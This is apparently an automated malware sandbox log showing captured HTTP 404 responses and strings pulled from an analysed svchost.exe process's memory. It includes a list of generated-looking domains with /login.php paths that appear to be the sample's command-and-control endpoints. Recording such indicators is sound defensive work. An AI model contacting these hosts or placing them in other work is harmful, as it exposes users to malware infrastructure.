Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1Tqm34XKyKNkTfHmQXQgrCQLSo9xhcLIhpY4fHRotCBwUO182%2B95GoYFaR6UlGI2z1O6fq8qUNkkUDvfq1PMBf5kNwce5q%2F9UTXqAWlIcaG4mjruW%2BTduDzdBVatA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb5f73a864376-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:53:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6yxmMiz0GykYnaZPBg3WIoUaAnjjJuMALy1zU5jybloHK0GPi17pSpNIgLmEUWoXVYDC30Z06LEXJNeIC730O98m4tjita1Cm4KdKlYO72txqG%2F4rqXZpcMckmtktA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb6060f4a1895-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:54:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="41.7",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="16.6",amp_optimizer;dur="4.8"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uerRVSqKt9lueXUYBU1HDW%2F7kPvuN196fpS15TKckOB7Cvm6G1a7GPXqG%2BvykSHqiP6vN1i8ivaCpi29YXa4hfAEx2JRsvh1xIB4zkXPq5EXeDBH508UYot9dCDdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb6447bf543df-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 08:54:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="41.6",amp_style_sanitizer;dur="20.5",amp_tag_and_attribute_sanitizer;dur="18.5",amp_optimizer;dur="4.0"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jIX8x1dmnG5It6Kp6CiEM0LW%2BKc50WoLptehkIP0i06IHQ7yHjWWtnpyYF0OvrljK7OVBD7fC0HSM97fQzsp4cnEDx%2BbZf%2Fjc4aU%2Fkq%2B3fseHaoX5y%2FWYbiaJOAkhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfdb64e384a42f5-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 08:52:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 08:52:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:52:35 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:52:36 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Sun, 08 Sep 2024 08:53:26 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Sun, 08 Sep 2024 08:53:27 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 08:53:28 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 08:53:29 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Sun, 08 Sep 2024 08:53:52 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Sun, 08 Sep 2024 08:53:52 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 08:53:53 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 08:53:54 GMT; Content-Type: text/html; Content-Length: 548; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Sun, 08 Sep 2024 08:54:11 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Sun, 08 Sep 2024 08:54:12 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 08:54:13 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Sun, 08 Sep 2024 08:54:14 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypah.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypuw.com/http://gadypuw.com/http://lymyjon.com/
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2109895377.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyqaw.com/login.php
Source: svchost.exe, 00000002.00000003.2563141332.00000000066EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvez.com/
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvis.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyzib.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088372788.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyces.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006806064.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahycib.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894616327.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1890971737.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydoh.com/login.php
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/H
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/k/LMEM
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydos.com/login.php
